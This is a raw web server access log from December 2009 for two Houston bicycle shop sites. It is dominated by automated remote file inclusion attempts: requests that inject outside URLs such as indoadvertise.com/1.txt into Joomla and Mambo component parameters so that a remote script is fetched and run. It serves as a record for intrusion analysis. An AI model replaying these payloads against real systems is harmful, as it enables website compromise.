82.195.252.206 - - [12/Dec/2009:12:31:54 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
131.107.0.111 - - [12/Dec/2009:12:32:29 -0800] "GET /robot.txt HTTP/1.1" 404 - "-" "-" "houstonbikeshop.com"
131.107.0.111 - - [12/Dec/2009:12:32:29 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:12:37:15 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:12:37:15 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:12:37:15 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:12:41:23 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:12:53:58 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:13:15:53 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:13:15:53 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:13:15:53 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:17 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:17 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:17 -0800] "GET /logs/access.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:24 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:24 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:24 -0800] "GET /logs/access.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:57 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:57 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:19:57 -0800] "GET /logs/access.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:20:15 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:20:15 -0800] "GET /logs/access.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:20:15 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.185.231.103 - - [12/Dec/2009:13:21:49 -0800] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sabra.ru/dssp_files/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.185.231.103 - - [12/Dec/2009:13:21:49 -0800] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sabra.ru/dssp_files/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.185.231.103 - - [12/Dec/2009:13:21:49 -0800] "GET /logs/access.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sabra.ru/dssp_files/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:13:22:34 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:13:22:34 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:13:22:34 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [12/Dec/2009:13:22:36 -0800] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/v5_4id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [12/Dec/2009:13:22:36 -0800] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/v5_4id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.41.101 - - [12/Dec/2009:13:22:37 -0800] "GET /logs/access.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/v5_4id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.128.32.30 - - [12/Dec/2009:13:27:43 -0800] "GET /logs/access.log HTTP/1.1" 200 456849 "http://foxcrawler.com/result.php?type=web&query=%2B39+%40yahoo.com%2C++txt+2009&query=%2B39+%40yahoo.com%2C++txt+2009&query=%2B39+%40yahoo.com%2C++txt+2009&ix=20" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "houstonbikeshop.com"
81.19.79.209 - - [12/Dec/2009:13:27:47 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "StackRambler/2.0 (MSIE incompatible)" "bicyclestoreshouston.com"
61.66.28.36 - - [12/Dec/2009:13:29:10 -0800] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.66.28.36 - - [12/Dec/2009:13:29:10 -0800] "GET /logs/access.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
61.66.28.36 - - [12/Dec/2009:13:29:10 -0800] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:13:33:13 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:33:13 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:33:13 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:33:49 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:33:50 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:33:51 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.59 - - [12/Dec/2009:13:34:37 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:34:37 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:34:37 -0800] "GET /logs/access.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:34:45 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:34:45 -0800] "GET /logs/access.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:34:45 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.chemsteel.co.kr/bbs//pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:35:38 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:35:38 -0800] "GET /logs/access.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.59 - - [12/Dec/2009:13:35:38 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.rgboy.fi//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:13:37:41 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:40:16 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:40:16 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:40:16 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:43:50 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:43:50 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:43:50 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:46:51 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:47:15 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:47:15 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:47:15 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:47:55 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:52:42 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:53:24 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:53:24 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:53:24 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:13:57:56 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
208.80.193.32 - - [12/Dec/2009:13:59:52 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ADVPLUGIN|K115|33|S867297454|dial; snprtz|S22701503000340|2600#Service Pack 2#2#5#1; .NET CLR 1.1.4322; Badongo 2.0.0; .NET CLR 2.0.50727)" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:13:59:59 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:14:08:20 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:14:08:20 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:14:08:20 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:14:08:29 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:14:08:30 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
213.171.225.234 - - [12/Dec/2009:14:09:35 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [12/Dec/2009:14:09:35 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 1767 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [12/Dec/2009:14:09:35 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 200 2377 "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:14:18:21 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:14:18:21 -0800] "GET /logs/access.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:14:18:21 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:14:18:22 -0800] "GET /logs/access.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:14:18:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:14:18:22 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:14:19:06 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
174.120.234.175 - - [12/Dec/2009:14:21:40 -0800] "GET //?_SERVER[DOCUMENT_ROOT=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.234.175 - - [12/Dec/2009:14:21:41 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.234.175 - - [12/Dec/2009:14:21:41 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Dec/2009:14:23:39 -0800] "GET /errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Dec/2009:14:23:39 -0800] "GET /logs/access.log%20%20/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Dec/2009:14:23:40 -0800] "GET /logs/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [12/Dec/2009:14:26:57 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [12/Dec/2009:14:26:57 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [12/Dec/2009:14:26:57 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [12/Dec/2009:14:26:57 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Dec/2009:14:29:22 -0800] "GET /logs/access.log/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:14:29:48 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:14:29:48 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:14:29:49 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
